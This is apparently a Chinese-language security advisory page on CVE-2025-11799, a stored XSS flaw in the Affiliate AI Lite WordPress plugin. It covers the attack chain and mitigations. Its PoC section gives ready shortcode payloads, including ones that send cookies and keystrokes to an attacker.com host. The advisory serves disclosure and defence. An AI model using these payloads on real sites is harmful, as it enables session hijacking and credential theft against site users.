IPBUF安全漏洞报告
English
CVE-2025-11799 CVSS 6.4 中危

CVE-2025-11799 WordPress Affiliate AI Lite插件存储型XSS漏洞

披露日期: 2025-11-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-11799
漏洞类型
存储型跨站脚本攻击(Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Affiliate AI Lite plugin for WordPress

相关标签

CVE-2025-11799存储型XSSWordPress插件漏洞Affiliate AI Lite短代码注入跨站脚本WordPress安全CVSS 6.4中危漏洞

漏洞概述

CVE-2025-11799是WordPress Affiliate AI Lite插件中的一个存储型跨站脚本(Stored XSS)安全漏洞。该插件版本至1.0.1存在严重的安全缺陷,由于对'asin'短代码属性的输入验证不足和输出转义不完整,攻击者可以通过在affiai_img短代码中注入恶意脚本。当其他用户访问包含恶意代码的页面时,注入的JavaScript代码会自动执行,可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。由于是存储型XSS,恶意代码会永久保存在数据库中,影响所有访问该页面的用户。

技术细节

该漏洞源于Affiliate AI Lite插件在处理affiai_img短代码的asin参数时缺乏充分的输入清理和输出编码。攻击者只需拥有WordPress网站的贡献者(contributor)级别权限,即可通过插入包含恶意JavaScript代码的短代码来利用此漏洞。具体来说,当用户在文章或页面中插入类似[affiai_img asin='" onload="alert(document.cookie)"']的短代码时,插件直接将asin参数值输出到HTML页面而未进行适当的转义处理。由于该参数值被存储在数据库中并永久生效,任何访问该页面的用户都会触发恶意脚本执行。此漏洞属于存储型XSS,与反射型XSS不同,其影响范围更广,危害更持久。攻击者可利用此漏洞窃取管理员Cookie、篡改页面内容或进行进一步的身份冒充攻击。

攻击链分析

STEP 1
信息收集
攻击者识别目标网站使用Affiliate AI Lite插件(版本≤1.0.1)
STEP 2
权限获取
攻击者获取WordPress网站的贡献者(contributor)或更高权限账户
STEP 3
恶意代码注入
攻击者在文章或页面中插入包含XSS payload的affiai_img短代码,asin参数包含恶意JavaScript
STEP 4
数据持久化
恶意短代码被保存到数据库,每次页面加载时都会输出未转义的参数值
STEP 5
脚本执行
受害者访问包含恶意代码的页面时,浏览器执行注入的JavaScript脚本
STEP 6
攻击完成
攻击者通过XSS成功窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-11799 PoC: Stored XSS via asin parameter --> <!-- Requires contributor-level access or higher --> <!-- Basic XSS PoC --> [affiai_img asin='"><script>alert(document.cookie)</script>'] <!-- Cookie stealing PoC --> [affiai_img asin='"><img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)'>'] <!-- Session hijacking PoC --> [affiai_img asin='"><script>document.location='https://attacker.com/phishing?token='+document.cookie</script>'] <!-- Keylogger PoC --> [affiai_img asin='"><script>document.addEventListener('keypress',function(e){new Image().src='https://attacker.com/log?k='+e.key})</script>']

影响范围

Affiliate AI Lite plugin for WordPress <= 1.0.1

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时措施:1) 临时禁用或删除Affiliate AI Lite插件;2) 限制低权限用户(尤其是贡献者)创建和编辑文章的权限;3) 启用WordPress的强力密码策略和双因素认证;4) 使用Web应用防火墙(WAF)规则过滤恶意请求;5) 手动审查现有文章内容,移除可疑的短代码。同时建议检查网站访问日志,排查是否存在异常访问或注入尝试痕迹。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表